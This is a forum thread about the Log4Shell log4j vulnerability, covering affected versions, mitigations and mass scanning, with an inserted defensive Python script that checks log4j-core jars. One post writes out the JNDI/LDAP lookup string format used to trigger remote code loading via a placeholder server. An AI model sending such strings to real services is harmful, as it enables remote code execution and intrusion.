Worst vulnerability in the last 10 years!

This looks nasty! Watch your servers.

1 Like

Or don’t connect your server to the outside world…

1 Like

I am puzzled. A whole page of words yet there is no information given (journalism at its finest). :thinking:
So far I’ve got “do not have minecraft server on your production server (unless you patch it)”. :face_with_raised_eyebrow:

5 Likes

https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/

If I had to run windows at home, Malwarebytes would be the only program I would run :rofl:

lol.

Java on a Server? Serious? Never!

1 Like

Every service that uses log4j can be attacked. It does not have to be internet-facing, because the attack can be carried to internal systems via payload.
log4j versions 2.0-beta9 to 2.14.1 are vulnerable, although log4j 2.10 or higher can be “hardened” against the attack with setting log4j2.formatMsgNoLookups to true or by removing the JndiLookup class. Log4j 2.15 is the first fixed version.

Several hosters already said that they see internet-wide scans for vulnerable services, most likely by attackers scanning for possible targets.

Here is an attempt by someone to list vulnerable services: https://github.com/YfryTchsGD/Log4jAttackSurface
Basically, everyone seems to be vulnerable.

Edit: Apparently, hackers only need to send a string in the format $JNDI:LDAP://SERVER/EXP to a vulnerable service to launch the attack.

2 Likes
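A defender-side check built on the version ranges given in the post above (an added example, not code from this thread or from the log4j project): it parses log4j-core version strings including pre-releases, applies the 2.0-beta9 to 2.14.1 window, and inspects a jar for the JndiLookup class to tell which mitigation still applies. It assumes the standard log4j-core jar layout (Maven pom.properties and the JndiLookup.class path); the jars it builds for itself are constructed fixtures.

```python
import io
import re
import zipfile

VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.I)
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def parse_version(text):
    """Turn '2.0-beta9' / '2.14.1' into a sortable tuple; pre-releases sort first."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {text!r}")
    major, minor, patch, pre, pre_n = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1, int(pre_n or 0))

FIRST_VULNERABLE = parse_version("2.0-beta9")
LAST_VULNERABLE = parse_version("2.14.1")
LOOKUP_FLAG_SINCE = parse_version("2.10")  # log4j2.formatMsgNoLookups exists from here

def classify(version, jndi_lookup_present=True):
    """Apply the ranges from the post: vulnerable 2.0-beta9..2.14.1, fixed in 2.15."""
    v = parse_version(version)
    if v < FIRST_VULNERABLE or v > LAST_VULNERABLE:
        return "not in vulnerable range"
    if not jndi_lookup_present:
        return "mitigated: JndiLookup class removed (still upgrade to 2.15+)"
    if v >= LOOKUP_FLAG_SINCE:
        return "vulnerable: upgrade to 2.15+, or set log4j2.formatMsgNoLookups=true / remove JndiLookup"
    return "vulnerable: upgrade to 2.15+ (formatMsgNoLookups unavailable before 2.10; remove JndiLookup)"

def inspect_jar(jar_bytes):
    """Read the log4j-core version from its Maven pom.properties and check for JndiLookup.class."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        if POM_PROPS not in names:
            return None, "not a log4j-core jar (no pom.properties)"
        lines = zf.read(POM_PROPS).decode().splitlines()
        props = dict(l.split("=", 1) for l in lines if "=" in l and not l.startswith("#"))
        version = props["version"].strip()
    return version, classify(version, JNDI_LOOKUP in names)

def make_fake_jar(version, include_jndi_lookup=True):
    """Constructed fixture: a minimal zip shaped like log4j-core-<version>.jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"#Generated by Maven\nversion={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    return buf.getvalue()

if __name__ == "__main__":
    for ver, keep in [("2.14.1", True), ("2.14.1", False), ("2.9.1", True), ("2.15.0", True)]:
        print(ver, "->", inspect_jar(make_fake_jar(ver, keep)))
```

Point inspect_jar at real jar bytes (for example every log4j-core-*.jar found under an application's lib directory) to get the same classification per file.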

LOL at the global mass scanning this has triggered.

So many l33t hax0rs / bad actors / nation states putting together lists of vulnerable services / organizations for potential future exploitation.

You can bet ransomware is being tweaked to use this CVE as a delivery mechanism too.

Only specific versions of log4j are vulnerable, small silver lining, but good luck opsec people trying to untangle this mess.

It’s the Guardian, what do you expect? Useful information? Truth? Integrity? Any standards at all? :rofl:

It’s not even journalism, it’s just tittle-tattle.

3 Likes

Update on the BBC.

1 Like

The “flagship” payment system used by my country’s government offices, to make huge payments daily, runs using Java Applets and hence needs Internet Explorer to run. There has been news about high school dropouts hacking the thing, but rewriting the application seems more expensive to the government than spending to catch these kids and dealing with losses there.

Technology is really amazing, isn’t it? :slightly_smiling_face:

1 Like

Well, rest assured, our purple little universe is far, far away from this issue. No Java on our server, only in my coffee mug :crazy_face:

6 Likes